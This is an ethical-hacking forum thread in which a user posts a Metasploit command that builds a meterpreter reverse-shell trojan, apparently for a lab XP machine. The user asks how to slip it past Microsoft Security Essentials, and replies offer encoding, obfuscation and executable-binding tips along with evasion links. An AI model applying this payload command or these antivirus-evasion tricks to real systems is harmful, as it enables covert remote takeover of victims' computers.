EH-Net

Hello again. Ive been making some trojans with msfpayload and have been messing with msfencode. The trojan has worked great dropping the meterpreter shell, however, for the life of me I cannot get it past microsoft security essential antivirus. No matter what I do, it flags it. My code is this:
msfpayload windows/meterpreter/reverse_tcp lhost=192.168.146.139 lport=4442 R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t raw -c 10 | msfencode -e x86/countdown -t exe > chucknorris.exe and I usually run an apache server and connect to it from the xp machine and download the trojan, or I do shared folders in VM. Any tricks yall know to bypass security essentials? I would think two counts of 10 a piece and shikata_ga_nai would do the trick, but alas it does not.

pff, this is not easy, i'd say you have two options. now please correct me if i'm wrong, i have no experience with this whatsoever!

first thing you could to to evade antivirus is make sure the code is different so it will not match the signature of the antivirus. You can do this by adding characters that may not be used. you can use the following parameter for this:     -b   The list of characters to avoid: 'x00xff'

another option would be to obfuscate the code or to attach the code to another executable, but i dont have any examples on that.

you probably already seen this one? http://www.offensive-security.com/metasploit-unleashed/Antivirus_Bypass (http://www.offensive-security.com/metasploit-unleashed/Antivirus_Bypass)

I've noticed that MSE is pretty darn good at catching these customized trojans.  I had it catch the PDF exploit for cool type almost instantly.  I've had it also pick up traffic from an exploited website before other AV products did (SEP, ESET, AVG).  I have no idea why people would be upset with a company who designed an OS to use their own built in AV.  One would think who would know their system better than the creator of that system.

You may have to get creative with bypassing MSE.

here are a couple of links that may help

http://www.scriptjunkie.us/2011/04/why-encoding-does-not-matter-and-how-metasploit-generates-exes/

http://www.scriptjunkie.us/2011/08/custom-payloads-in-metasploit-4/

this thread from msf mailing list
http://mail.metasploit.com/pipermail/framework/2011-April/007630.html

Another resource http://schierlm.users.sourceforge.net/avevasion.html

Thanks for the links. Glad to know, its not just my issue, lol. Now I thought shikata_ga_nai was polymorphic? curious why that wouldnt evade SE, unless like the article said, SE bases it off templates. I even did a trick where I uploaded the trojan, ran iexpress and made a self extracting executable by attaching it to calculator, so that when they closed out calc after use, it ran the meterpreter reverse_tcp. But it flagged that too and under the properties of the trojaned calc its even  signed by microsoft,lol